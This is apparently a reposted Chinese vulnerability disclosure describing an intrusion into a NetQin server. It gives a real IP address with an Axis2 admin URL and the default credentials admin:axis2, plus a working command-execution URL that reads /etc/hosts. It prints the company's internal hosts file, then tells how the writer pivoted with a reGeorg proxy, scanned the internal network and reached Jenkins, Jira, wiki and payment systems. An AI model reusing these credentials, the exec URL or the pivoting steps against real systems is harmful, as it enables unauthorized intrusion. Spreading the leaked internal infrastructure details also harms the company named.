网秦某站弱口令导致的一次内网漫游 中国骇客云端在线教程漏洞发布网

漏洞详情

纯属偶遇,由Axis2的弱口令导致getshell,然后内网漫游了一下

http://211.151.59.27:80/axis2/axis2-admin/login

admin:axis2

QQ20160615-2.png

漏洞证明:

getshell

http://211.151.59.27/axis2/services/Cat/exec?cmd=cat%20/etc/hosts

QQ20160615-1.png

QQ20160615-0.png

通过hosts可以看到是网秦的服务

HEADER: This file was autogenerated at Thu Aug 21 16:56:16 +0800 2014# HEADER: by puppet.  While it can still be managed manually, it# HEADER: is definitely not recommended.# Do not remove the following line, or various programs# that require network functionality will fail.127.0.0.1	localhost.localdomain	localhost BJ-YZ-S-ST040::1	localhost6.localdomain6	localhost6127.0.0.1	oversea192.168.3.46	bjyz.puppet.nq.com192.168.0.41	a03	pbsvc.nqcloud.com comcon.netqin.com cn-pbsvc.nq.com pbsvc.nq.com cn-pbsvc-dl.nq.com i-contact.netqin.com192.168.0.217	a12	app.netqin.com211.151.59.71	a09	blyt.netqin.com192.168.0.143	a08	i.netqin.com i.nq.com m.nq.com192.168.5.212	a13	c.cpsserver.cns192.168.0.148	a05	nqses.nq.com192.168.3.35	a11	pay.netqin.com pay.nq.com192.168.3.53	a07	my.netqin.com192.168.3.52	a06	mpay.nq.com my.nq.com jf.netqin.com wurfl.netqin.com wapcms.netqin.com r.netqin.cn wap.netqin.com ad.netqin.com new.netqin.com192.168.5.216	a15	dbapp.nq.com192.168.5.207	a16	dbboss.nq.com192.168.5.218	a14	dbuis.nq.com

QQ20160615-3.png

拿到shell了,reGeorg开个代理进内网

namp扫了一下内网网段,内网比较大

设计大量内部系统,wiki,jenkins,jira,内部管理系统,会议室预定系统,报表管理系统等等,以及大量开发测试文档

QQ20160615-6.png

QQ20160615-8.png

QQ20160615-10.png

QQ20160615-11.png

QQ20160615-12.png

QQ20160615-13.png

QQ20160615-14.png

QQ20160615-15.png

程序员千行bug率….

QQ20160615-16.png

jenkins 又可以搞下好多机器了

QQ20160615-17.png

QQ20160615-19.png

QQ20160615-20.png

QQ20160615-21.png

QQ20160615-22.png

可申请点卡..

QQ20160615-23.png

QQ20160615-24.png

QQ20160615-26.png

QQ20160615-27.png